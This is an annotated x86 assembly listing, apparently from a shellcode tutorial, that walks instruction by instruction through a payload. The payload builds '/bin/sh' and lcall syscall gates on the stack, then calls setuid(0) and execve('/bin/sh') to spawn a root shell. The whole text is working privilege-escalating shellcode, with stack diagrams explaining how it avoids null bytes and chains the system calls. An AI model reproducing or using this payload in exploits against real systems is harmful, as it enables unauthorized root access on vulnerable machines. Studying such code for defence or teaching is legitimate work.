; The assembly instructions | Action | Stack 1: xorl %eax, %eax | eax = 0; | 2: xorl %ecx, %ecx | ecx = 0; | 3: addb $0x68, %cl | ecx = 0x68; | 4: pushw %cx | put ecx on top of stack | = [ h\0 ] 5: pushw $0x732f | put /s on top of stack | = [ /sh\0 ] 6: pushl $0x6e69622f | put /bin on top of stack | + [ /bin ] 7: movl %esp, %ebx | ebx = &"/bin/sh" | 8: pushl %eax | put NULL on top of stack | + [0x00000000] 9: pushl %ebx | put &"/bin/sh" on tos | + [ ebx ] 10: addb $0xdf, %cl | ecx = 0x47 | 11: pushw %cx | put 0x47 on tos | _ 12: pushl %eax | put 0x00 on tos | _ 13: movw $0x9a90, %dx | edx = NOP ; LCALL | _ 14: pushw %dx | put NOP ; LCALL on tos | + lcall $0x47, | | $0x00000000 15: pushw $0xc033 | put 'xorl %eax, %eax' on tos | + [ 0xc033 ] 16: pushw %cx | _ | _ 17: pushl %eax | _ | _ 18: pushw %dx | put NOP ; LCALL on tos | + lcall $0x47, | | $0x00000000 19: pushw $0x5890 | put POPL %EAX on tos | + [ 0x5890 ] 20: pushw %cx | _ | _ 21: pushl %eax | _ | _ 22: pushw %dx | put NOP ; LCALL on tos | + lcall $0x47, | | $0x00000000 23: movl %esp, %ecx | ecx = &lcall, pop, lcall, .. | 24: movl %ebx, %edx | edx = &"/bin/sh" | 25: addl $0xfffffff8, %edx | edx = &&"/bin/sh" (9) | 26: pushl %edx | put (9) on tos (env) | + [ ebx - 8 ] 27: pushl %edx | put (9) on tos (argv) | + [ ebx - 8 ] 28: pushl %ebx | put ebx on tos (path) | + [ ebx ] 29: pushl %eax | put $0x0 on tos (uid -> 0) | + [0x00000000] 30: addb $0x11, %al | eax = $0x11 | 31: pushl %eax | put 0x11 (n. of execve sysc) | + [0x00000011] 32: pushl %ecx | put offset of 1st lcall | + [ ebx - x ] 33: addb $0x25, %al | eax = 0x36 (n. of setuid sc) | 34: ret | eip = ecx | Upon ret the stack has: 0x00000011 0x00000000 0x.....ebx 0x....&ebx 0x....&ebx eax = 0x36 syscall -> uid = euid = 0 popl eax -> eax = 0x11, stack = 0x00000000 0x...... syscall -> execve("/bin/sh", argv, argv); xorl eax, eax -> eax = 0 syscall -> exit (if failure of execve)